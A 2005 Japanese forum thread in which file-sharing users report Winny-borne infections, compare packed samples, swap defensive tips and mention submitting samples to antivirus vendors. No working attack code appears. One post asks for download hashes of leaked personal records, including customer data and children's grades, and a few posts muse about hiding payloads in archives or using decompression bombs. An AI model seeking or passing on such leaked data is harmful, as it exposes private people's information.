仮にも「ウィルス」疑惑があるものをやり取りするにはあなたが通報屋氏と同じくらい
信用を勝ち取る必要があると思う。
まかり間違えば業務妨害やら器物損壊やらに問われかねないんでな>提供
まずはメアド晒すとかコテ+鳥くらいは付けてみたらどうだろうな。
通報屋氏のこれまでの地道な努力は「俺にも出来るだろう」程度のものではないよ
890[名無し]さん(bin+cue).rar:2005/06/07(火) 06:55:22 ID:SBg5axh10
>>888
自己責任
自業自得
わかってるやつにはおもしろい(かった)
891[名無し]さん(bin+cue).rar:2005/06/07(火) 10:32:25 ID:QY8JTY5f0
892ひみつの文字列さん:2024/12/25(水) 21:42:58 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
893通報屋 ◆Y39/vakKjY :2005/06/07(火) 14:20:37 ID:QMTrZ3MC0
>>892
一応調べてみたけど山田とは違う言語でできてる見たい。
mellponとかの記述もないし。
(山田:VisualC++ こいつ:Delphi)

あ、それと他の会社の通報してくれる人も歓迎です。
私一人ではカバーしきれない部分をカバーしてくれると幸いです
ただ・・・889氏の言うとおり疑惑ファイルなので扱いが非常に難しいです。
いくらかニュイルススレ報告上がっているのも提供していますので。
(でもほとんど単体では不正活動を行わないため、安全です。ということでした・・・今後変わるかもしれんけど)
894[名無し]さん(bin+cue).rar:2005/06/07(火) 14:21:43 ID:ZEa5G+5e0
shareもウィルスふえたな
以前はnyの移植って感じであまり多くない印象だったが
895[名無し]さん(bin+cue).rar:2005/06/07(火) 18:03:15 ID:X1d9dHp30
nyで、ダウンしたmpeg形式にファイルが変換終了と同時くらいに消えるんですが・・・
新種のウイルス??ですか?ウイルスソフトは
「ウイルスが発見されました。ファイルへのアクセスができません。」
で、無責任に何もしません。いったいファイルはどこへ行ったのやら・・・
896[名無し]さん(bin+cue).rar:2005/06/07(火) 18:06:21 ID:FC7f65dT0
ウィルスだと思って消してんじゃね?
897[名無し]さん(bin+cue).rar:2005/06/07(火) 18:07:46 ID:7SQJVAZN0
通報屋仕事しろ
898[名無し]さん(bin+cue).rar:2005/06/07(火) 18:18:32 ID:hH1hs36b0
>>895
ソフトが検出してるなら既知のウイルスだからスレ違いだね。
使ってるソフト名や検出ウイルス名もわからないから、助言も
できないし。(´・ω・`)
899[名無し]さん(bin+cue).rar:2005/06/07(火) 18:19:17 ID:er09qDqB0
ボランティアですからw
900[名無し]さん(bin+cue).rar:2005/06/07(火) 18:44:00 ID:io/avYJZ0
通報屋氏が拾ったSVK Protectorがかかったブツってのは、
なんかの業務ソフトの破片じゃねーのかな。山田作者程度が使うような
ものじゃない気がするけど、もし、ほんとに使われてたら…
バスターでも先生でもパターンファイル一致方式だと、もう検出できない
ソース解析は無理だし、VM環境で走らせても条件発動ものだと分からないし

今まで拾った山田亜種のなかには、UPX使ってさらにPEiDかぶせてるのがあった
けど、山田亜種のSVKPパックものには、かなりの金をかけてることになるねぇ。
901[名無し]さん(bin+cue).rar:2005/06/07(火) 19:03:05 ID:qDg9LLCU0
いやもう通報屋はいいから。
902529:2005/06/07(火) 19:05:05 ID:wIBHJzlm0
529です。
オンラインのパンダでチェックしたら
Trj/DelWin.N
に感染しているってさ。
ということで
709もどうようです。
903[名無し]さん(bin+cue).rar:2005/06/07(火) 19:22:08 ID:a5BLNw9D0
>>900
多少金がかかっても脅威を作っていかないとウイルス対策ソフト売れないしね
904[名無し]さん(bin+cue).rar:2005/06/07(火) 19:53:39 ID:RQ1Kv1LZ0
PC界はいまだに冷戦構造ですか
905[名無し]さん(bin+cue).rar:2005/06/07(火) 19:56:40 ID:hH1hs36b0
出来レースというか八百長試合というか。
906通報屋 ◆Y39/vakKjY :2005/06/07(火) 20:14:56 ID:QMTrZ3MC0
>>900
パック解凍してみようかと苦戦したけどむりっぽい
(アンパッカー使って)
業務用ソフトの件はありうるんだけど、アイコンがフォルダ偽装ってとこが・・・
でもTrialもあるのでその線も(ry
907[名無し]さん(bin+cue).rar:2005/06/07(火) 21:14:02 ID:qDg9LLCU0
>>906
ねぇ、ここ山田ウィルススレじゃないからさ・・・。
そんなに書き込みたきゃスレ作れよ。
908[名無し]さん(bin+cue).rar:2005/06/07(火) 21:23:21 ID:52lnVUVa0
VM環境で
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\svkp
が作られるなら、80%でクロなんだが
909[名無し]さん(bin+cue).rar:2005/06/07(火) 21:30:27 ID:h72DvOTq0
>>908
20%も誤爆が有るんならどうしようもないだろ
910通報屋 ◆Y39/vakKjY :2005/06/07(火) 21:31:36 ID:QMTrZ3MC0
>>907
そうだな・・・
ここニュイルススレだったよ。
頭冷やしてくるわ
スレ違いスマソ
911[名無し]さん(bin+cue).rar:2005/06/07(火) 23:58:24 ID:ZEa5G+5e0
セキュスレ覗いたらウィルスなんて見たことも感染したこともねぇ〜Yo
ノートンいらね
って香具師がちらほらいた

ちょっとカルチャーショック
ダウソ民には日常ちゃめしどきなのに・・・・
それとも気付いてないだけとか?
912[名無し]さん(bin+cue).rar:2005/06/08(水) 00:01:05 ID:MgNSl//L0
>>910

ノートン、ウイルスバスター、マカフィー、ウイルスセキュリティ、NOD32、V3ウイルスブロック 
ウイルスドクター、ウイルスプロテクター、ウイルスチェイサー、ソフォス、F-Secure、Kaspersky、Panda

BitDefender、AntiVir、avast!、eTrust、AVG、ClamWin


この中で新種のサンプル送ってないのはどの製品?(返事がきてるかどうかは別にしてね)
913通報屋 ◆Y39/vakKjY :2005/06/08(水) 00:13:44 ID:l7huGFZc0
>>912
ノートン、VBは送ってある。
ウイルスチェイサー、NOD32、McAfeeは送付の調整中
ウイルスドクターはこれからメール。
つーわけでほとんどです('A`)オレノバカ
914[名無し]さん(bin+cue).rar:2005/06/08(水) 00:23:33 ID:ymKlO0sV0
20years after...

なぜウイルスのサンプルを送り続けるのですか?

−そこに、ウイルスがあるから。

           通報屋 ◆Y39/vakKjYの言葉
         平成偉人伝 <通報屋 ◆Y39/vakKjY〜いちファイル共有ソフトユーザーの戦い>より抜粋
915[名無し]さん(bin+cue).rar:2005/06/08(水) 00:27:27 ID:6+9ntlDS0
916[名無し]さん(bin+cue).rar:2005/06/08(水) 00:44:36 ID:3daoU0C60
>>913 通報屋 ◆Y39/vakKjY

いつも乙。
ところでさ、各社に送るのも大変だから、Webにアプして「取りに来い」
っていうのは どうかね?  やっぱ無視されるかなぁ?
917[名無し]さん(bin+cue).rar:2005/06/08(水) 01:00:30 ID:x/P1AztB0
>>913

凄いいっぱい送ってますね。すばらしい!!
参考になりました。
918[名無し]さん(bin+cue).rar:2005/06/08(水) 01:07:49 ID:GtYk183D0
>>916
ウィルス配布になっちゃう。
確かに配布自体は今のところ罪じゃないけど、それを拾った人間が誰かに被害を
与えたりしたら通報屋さんまで罪に問われる可能性はある訳だし。
919[名無し]さん(bin+cue).rar:2005/06/08(水) 01:30:50 ID:c4ZwvikQ0
>>911
セキュ板には俺も出入りしてるけど、まぁなんだ、いろんな人がいるのよ。
勝つためには敵を知ること、つーわけでニュイルススレに出入りしてるのだが
敵さんは、いろいろ発想してくれるよまったく。

もしかして、山田感染者も一種のゾンビPCになってないか?
SPAM砲みたく、あちこちに氾濫し始めてるな。nyとは関係ないけどね。
920[名無し]さん(bin+cue).rar:2005/06/08(水) 02:09:53 ID:7NECr6th0
先ほど間違えて落としたaviファイルを再生したところ
explore.exeを終了します。と、
言われ、もう1つ(何か忘れた).exeを終了します。と言われ
その後、画面フリーズしたんですけど、これウィルスすか?
左or右クリックしただけでなるんです。 orz

何度か再起動させてファイルは削除したんですけど、その後
は特に何も無く、ノートンでも何も出ませんでした。
なにかアドバイスお願いします。
921[名無し]さん(bin+cue).rar:2005/06/08(水) 02:14:56 ID:2biIefbA0
>>920
IDがNECだなw ちょうどいいから>>915のをコピペしてスレ立ててくれない?

んでそれがウイルスかどうかはそれだけの情報じゃ良く分からない。
一応nyならUPフォルダを作成されてないか確認したほうがいいよ。
nyの「フォルダ情報」を開くとかしてね。
922[名無し]さん(bin+cue).rar:2005/06/08(水) 02:29:17 ID:7NECr6th0
>>921
すいません。nyです。確認してみたらUPフォルダはありませんでした。

自分、2ch初心者なモンでスレ立ては勘弁してください。orz
他に何か確認することはありますか?
一応ファイル名です↓
(アニメHシーン) AIKa パンチラシーンダイジェスト.avi
923[名無し]さん(bin+cue).rar:2005/06/08(水) 02:32:57 ID:2biIefbA0
>>922
キンタマ系ではないみたいね。
じゃぁ http://127.0.0.1/ を開いたら何か見える?(見えたら山田ウイルス)


あとスレ立てよかったらおながいします、せっかくIDキテルのにもったいないス
↓↓↓↓コピペ用↓↓↓↓

NECファシリティーズ、人事考課データ395人分がWinnyで流出
ttp://internet.watch.impress.co.jp/cda/news/2005/06/07/7917.html
ttp://www.itmedia.co.jp/news/articles/0506/07/news105.html

NECの裏事情32
http://tmp5.2ch.net/test/read.cgi/company/1113929589/353-
924[名無し]さん(bin+cue).rar:2005/06/08(水) 02:33:03 ID:O6Q0egyJ0
>>914
号泣した
925[名無し]さん(bin+cue).rar:2005/06/08(水) 02:34:54 ID:2biIefbA0
そのかわり (アニメHシーン) AIKa パンチラシーンダイジェスト.avi を調査しますので(^_^;
926[名無し]さん(bin+cue).rar:2005/06/08(水) 02:39:30 ID:2biIefbA0
スレ立ては
http://tmp5.2ch.net/download/
このページの一番下に「新規スレッド作成画面へ」ってところがあるのでここからおながいです。

無理そうでしたら結構です(^^;
927[名無し]さん(bin+cue).rar:2005/06/08(水) 02:44:41 ID:7NECr6th0
>>923
開けなかったです。
山田のことが先に頭に浮かんだので
checkツールも試したら大丈夫でした。

スレ立て考えておきます。
できるとしても朝から仕事なもんで、
夕方、帰ってからになると思います。

アドバイスありがとうございました。
928[名無し]さん(bin+cue).rar:2005/06/08(水) 02:55:55 ID:2biIefbA0
>>927
そっか、じゃぁいいや、明日の夕方じゃ遅すぎるしID変わっちゃってそうなんで。
無理言ってすまんス。
929[名無し]さん(bin+cue).rar:2005/06/08(水) 03:05:38 ID:2biIefbA0
ホスト規制で立てられずorz
930[名無し]さん(bin+cue).rar:2005/06/08(水) 03:54:25 ID:P+DEukGb0
当方XPpro SP1にて
不完全(強制変換)なaviだとプロパティ確認だけで
Explorer.exeのCPU処理が以上に高くなって動作不具合を引き起こすから
それと似たような状態だと思うが
_incompleteをリネームしたファイルを落としたとかね
931[名無し]さん(bin+cue).rar:2005/06/08(水) 11:18:45 ID:hzd3oaDw0
>>892
それ踏んじゃったょ。。。orz
今んとこと目立った症状はないけど。。(((( ;゚Д゚)))ガクガく
932[名無し]さん(bin+cue).rar:2005/06/08(水) 11:58:00 ID:vLbyjlnw0
検索しているのですが、見つからないのでハッシュを知っている人、教えてm(_ _)m
1、千葉県の職員名簿流出
2、ドコモ東海の顧客情報流出
3、愛知県の小学校全児童の成績表流出
933[名無し]さん(bin+cue).rar:2005/06/08(水) 12:08:38 ID:c4ZwvikQ0
他人の情報を得ようというなら、まず自らが開陳しないとな
というか、帰れよ
934[名無し]さん(bin+cue).rar:2005/06/08(水) 12:22:50 ID:PNehMvDx0
>>932
仁義なき・・・じゃないの?
935[名無し]さん(bin+cue).rar:2005/06/08(水) 13:20:34 ID:Sficym3m0
毎日によれば1は仁義キンタマじゃないらしい。
2と3は仁義キンタマ。
936ひみつの文字列さん:2024/12/25(水) 21:42:58 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
937[名無し]さん(bin+cue).rar:2005/06/08(水) 17:40:43 ID:UkZsmvr40
zip lzh のアイコンは別なものに変える。
解凍レンジ、その他解凍ソフトにあるような閲覧モードで
中身を確認してから、解凍する。
これ基本
938[名無し]さん(bin+cue).rar:2005/06/08(水) 17:44:52 ID:GVZysqBS0
>>936
たくさんの画像の中に1枚だけそういうの入れれば引っかかる香具師多いのにな。
150ページ以上あるコミックとかに入れたらPC上級者でもうっかり引っかかるヤツはいるだろうな。
939[名無し]さん(bin+cue).rar:2005/06/08(水) 18:25:43 ID:K+vZYZu40
>>938
その手のはみたことあるよ。旧キンタマ系が多かったが。
4MBのを解凍して1.2GBのjpegってのは、システム落ちを狙ってるのかねぇ
対象がNTFSだったら、それこそコマンド一発で200GBのファイルとか作れるので
そのへんも気をつけたほうがいいかもね。あるいは普通に圧縮ボムとか
940[名無し]さん(bin+cue).rar:2005/06/08(水) 19:31:08 ID:oMiQqE7Q0
ブラックフレームのみのaviなら2.5Gで2MB位まで圧縮いけるけどね。
ま、そんなの解凍しても途中でキャンセルされるだろうけど、D&Dだとどうなるか分からん。
941[名無し]さん(bin+cue).rar:2005/06/08(水) 20:06:00 ID:eUpVARC+0
http://127.0.0.1/
うわーん感染してたよ。
開いたら取り消されたアクションとかでてなんかいろいろ書いてるよー。
942[名無し]さん(bin+cue).rar:2005/06/08(水) 20:22:27 ID:si4PPH4e0
>>941
ハッシュきぼん
943[名無し]さん(bin+cue).rar:2005/06/08(水) 20:46:05 ID:sMODW5130
>>941
感染してねぇよ
944[名無し]さん(bin+cue).rar:2005/06/08(水) 21:40:27 ID:84c4QB0v0
>>941
早く再インストしろ。
945[名無し]さん(bin+cue).rar:2005/06/08(水) 23:57:34 ID:VVBfFuDQ0
>>941
カワイソス
946[名無し]さん(bin+cue).rar:2005/06/09(木) 02:36:54 ID:F5j9twJm0
★流行種その3
【Autorun+batを利用したウイルス】
にタブン感染してしまったorz.

で感染したあとにふと疑問に想ったのですが。
感染する前にCDイメージをウィルススキャンすると
CDイメージの中にウィルスが入っているかどうかわかるものなのですか?。
感染後の対処法はよく書かれているので知識としてはOKなのですが。
未然に防ぐ方の知識が少なくてorz。

えと一応テンプレもカキコしときますね。
【使用OS】 me
【WindowsUpdateしてるか】
【使用AntiVirusソフト】 ノートン先生
【AntiVirusをUpdateしてるか】 使用する前に必ずしています。 
【Winnyのバージョン】 v2.0b7.1
【Winny歴、総DL量】 半年 約20GB
【テンプレを読んだか】 はい
【テンプレにある対策を実行したか】 はい(再インストしました。)
【症状、具体的に分かる限りすべて書く】 してしまった後なので詳しく覚えていないorzスイマセン。
【何をしたらそんなことになったのか】 マウントしてしまいました。
※感染元のファイルの情報もあると良し
【これまでにとった措置】
再インストールシマスタ:ω;。
947[名無し]さん(bin+cue).rar:2005/06/09(木) 04:39:21 ID:lVA+ba8k0
そもそもオートランは切っておく、これは常識
イメージをそのままスキャンしてもだめぽ
イメージをマウントしてCDの内容をスキャンすれば既出ウイルスなら発見可能
あとゲームにbatファイルがあることは少ないのであったら警戒すべし
948[名無し]さん(bin+cue).rar:2005/06/09(木) 05:19:03 ID:wkXuuYp60
nyで落としたイメージをオートランがオンの状態でマウントするなんて勇者だなw
949[名無し]さん(bin+cue).rar:2005/06/09(木) 10:01:47 ID:NO2bporA0
多分感染してしまいました・・が、どれに該当するのかサッパリ分かりません;;
nyのDownフォルダに消せないフォルダができてしまいました(セーフモード等色々試しましたが、消えませんでした)

【使用OS】 XP
【WindowsUpdateしてるか】
【使用AntiVirusソフト】 ウィルスセキュリティ
【AntiVirusをUpdateしてるか】 使用する時毎です。
【Winnyのバージョン】 v2.0b7.1
【Winny歴、総DL量】 1年 約50GB
【テンプレを読んだか】 はい
【テンプレにある対策を実行したか】 再インスコ以外ほとんど実行しました
【症状、具体的に分かる限りすべて書く】 nyのUPフォルダ内に、今まで落としたmp3等にexeファイルを追加されました。
テンプレ読んで色々試してみたら、その後はny繋いでないせいか消せないフォルダ以外は何の被害もないように思えます。
【何をしたらそんなことになったのか】 「(サントラ)ファイナルファンタジーヴォーカルコレクションズ2」というファイル
ウッカリexeファイルを開いてしまったようです。
【これまでにとった措置】 これから再インストールしたいと思います。

再インスコする前に、mp3をCDに落とそうかと考えているのですが、マズイですかね・・?
一度exeファイルを追加されてたのですが、そちらだけ削除してmp3だけ移動させたやつなのですが、
友人に頼まれてたのがあったので焼こうか焼くまいか悩んでおります、アドバイスお願いします;;
950[名無し]さん(bin+cue).rar:2005/06/09(木) 10:44:39 ID:23LtQFQX0
Q : mp3をCDに落とそうかと考えているのですが、マズイですかね・・?
A : _、_
 ( ,_ノ` )     n    こんな違法ダウソ厨とニュイルス作者しか居ないところで書かれたことを信用するんですか? だったら言ってあげますよ
 ̄    \   ( E)   罠満載!書き込みした瞬間に個人情報撒くわ
フ  癌  /ヽ ヽ_//   専用UploaderにデスクトップのSS投稿するわ重要ファイルは消えるわ家は燃えるわ大騒ぎ!!pgr
951[名無し]さん(bin+cue).rar:2005/06/09(木) 11:20:38 ID:udCWr9Ax0
Antinny系だと思うんですけど、症状などが一致しないので
既出かどうかわからないです、

【使用OS】 XP HOME SP2
【WindowsUpdateしてるか】 してます
【使用AntiVirusソフト】 ノートン
【AntiVirusをUpdateしてるか】 はい
【Winnyのバージョン】 v2.0b7.1
【Winny歴、総DL量】 1年
【テンプレを読んだか】 はい
【テンプレにある対策を実行したか】 該当無し?
【症状、具体的に分かる限りすべて書く】
PCを起動した直後のデスクトップ画像をキャプられる。
Program Filesの中にdaemontoolというフォルダが作成されていて
その中にキャプ画像をPNG形式で保存してる。
windows\system32にwmpアイコンに偽装してるexplorer.exeがあった。
down, Cacheフォルダともに特に異常は見受けられないです
【何をしたらそんなことになったのか】
[シングル][2005.06.08] ORANGE RANGE - お願い!セニョリータ [192kbps].zip
の中のexeをうっかり踏んでしまったからだと思います
ノートンのスキャンでも反応ありませんでした
【これまでにとった措置】
措置というか、ドライブスキャンもしましたが、反応無しでした。
上記のwmpアイコンに偽装してるexeを削除してみたら、
スクリーンショットはされなくなったみたいです

という感じなのですが、どれに該当するのか分かりにくいです;;
普通に既出なのでしょうか?
952[名無し]さん(bin+cue).rar:2005/06/09(木) 11:35:44 ID:ZVMKlI6JO
OS : me
これだけでネタと判断してしまうのは間違いでしょうか?
953[名無し]さん(bin+cue).rar:2005/06/09(木) 11:38:41 ID:ZVMKlI6JO
>>950
音楽CDとして焼け
954ひみつの文字列さん:2024/12/25(水) 21:42:58 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
955[名無し]さん(bin+cue).rar:2005/06/09(木) 12:13:11 ID:Ggnaay5h0
どこかの初心者スレにこのスレのアドレスが貼られたのか?
956[名無し]さん(bin+cue).rar:2005/06/09(木) 12:39:07 ID:y+J9n/SH0
はいそうです、すみません。教えてください。キンタマみたいに個人情報流れるの困りまs
957[名無し]さん(bin+cue).rar:2005/06/09(木) 13:13:48 ID:8JIyCdu40
ならば、

初心者の方へ
このスレは、nyをターゲットにし、繁殖するニュルス(nyウイルス)に付いて
未知のものを対象に、解析および情報交換を行なうところです。
山田は、山田スレへ。
958[名無し]さん(bin+cue).rar:2005/06/09(木) 13:50:34 ID:bIRPabmj0
ニュルス
959[名無し]さん(bin+cue).rar:2005/06/09(木) 14:02:10 ID:Y1/URxYn0
うっかりクリックするようなやつは2度とP2Pに手出すな
960[名無し]さん(bin+cue).rar:2005/06/09(木) 14:09:20 ID:ovLLYW0x0
>>948
daemonってばオートラン切れなく無いですか?
961[名無し]さん(bin+cue).rar:2005/06/09(木) 14:11:43 ID:VkKKMIF/0
>>960
いいえ
962[名無し]さん(bin+cue).rar:2005/06/09(木) 14:13:52 ID:y+J9n/SH0
オートラン切るよりShift押しながらマウントする方法がお勧めですよ
963[名無し]さん(bin+cue).rar:2005/06/09(木) 14:23:22 ID:pLW2bkCl0
Shift使用時はあらかじめマイコンピュータを開いておいて
CDROMドライブアイコンの表示が変わってもしばらくは押し続けるようにな
964[名無し]さん(bin+cue).rar:2005/06/09(木) 17:41:41 ID:kyvQg3gf0
ID:y+J9n/SH0
助けを求めながら、釣り発言をする姿勢に惚れた
965[名無し]さん(bin+cue).rar:2005/06/09(木) 19:30:08 ID:xy/ZB8I80
ここ数日、CPU100%近く 喰ってしまうことがある。
起動後、長くて30分、短いと10分程度で上記状態になる。
ファイルは落ちてくるし、変換も問題なくできるので発生理由が不明確。
現象発生前後で落したものの起動などはしていないのでウイルスではないと推測。
ny使用ポートへのポート攻撃と思われる。
iptablesの指定を修正して解決済と思われるが、念のため報告。
デフォルトで怪しいのを落す指定になっている、まともなルータなら問題ないだろう。

【使用OS】 2kSP4
【WindowsUpdateしてるか】 最新まで適用済。
【使用AntiVirusソフト】 ウィルスバスター2005
【AntiVirusをUpdateしてるか】 自動update
【Winnyのバージョン】 v2.0b7.1
【Winny歴、総DL量】 2.5年 約1.5TB
【テンプレを読んだか】 はい
【テンプレにある対策を実行したか】 レジストリ検索した。HDD、メモリとも問題なし。
また、ny自体の上書きインストール、再起動も行った。

【症状、具体的に分かる限りすべて書く】
起動後10分から30分程度でCPU使用率100%近くになり、
nyが反応しなくなる。 他のアプリは正常。

【何をしたらそんなことになったのか】
なにもしていない。

【これまでにとった措置】
以下のルールをnyのNAT設定の前に追加。
現在起動後40分経過しているが、今のところ問題なし。

iptables -A FORWARD -o ppp+ -p tcp --tcp-flags SYN,RST SYN -j TCPMSS --clamp-mss
-to-pmtu
966[名無し]さん(bin+cue).rar:2005/06/09(木) 20:18:41 ID:xy/ZB8I80
1時間半経過したが、問題なし。
時間平均500k程度で稼働中。
967[名無し]さん(bin+cue).rar:2005/06/09(木) 21:25:21 ID:l7EMDrgt0
ウィルスバスター2005 のウイルス入りパターンファイルが原因ではないよね
968946:2005/06/09(木) 21:59:04 ID:F5j9twJm0
947氏ヘ。
レス アリガトウございますm(_ _)m。
えっとCDイメージのままでスキャンしても駄目なのですか。
初めて知りました...orz。
一度焼いてその状態でCDをスキャンすると…。
ほむふむ..._〆(・∀・ ) メモメモ。

948氏へ。
いやぁ。ついうっかりシテイマシタ。落とすのに長い時間がかかってしまって。
はやる気持ちを抑えきれずに...注意力が欠けていましたorz。

952氏へ。
meはどうも長いこと使っているのでXPよりも使い勝手がよくて。
っと言ってもノートン先生はXPに入っているので。
毎回スキャンするごとにXP使ってるのですがねorz。
969[名無し]さん(bin+cue).rar:2005/06/09(木) 22:02:59 ID:medCtYpl0
>>968
焼かなくても、オートランをOFFにした状態でマウントして
ウィルススキャンをすればいいよ。
970[名無し]さん(bin+cue).rar:2005/06/09(木) 22:04:26 ID:xy/ZB8I80
>>967
そっちは回避した。
起動後2時間でCPU100%消費状態でダメだった…。

HDD交換してみる。
971[名無し]さん(bin+cue).rar
>一度焼いてその状態でCDをスキャンすると

947は「イメージをマウントして」と言ってるので
DAEMONtoolsでも可だろう Winやアプリからすれば中身のファイル参照できる状態なワケだから。
もちろん自動で立ち上がったら ウイルス即死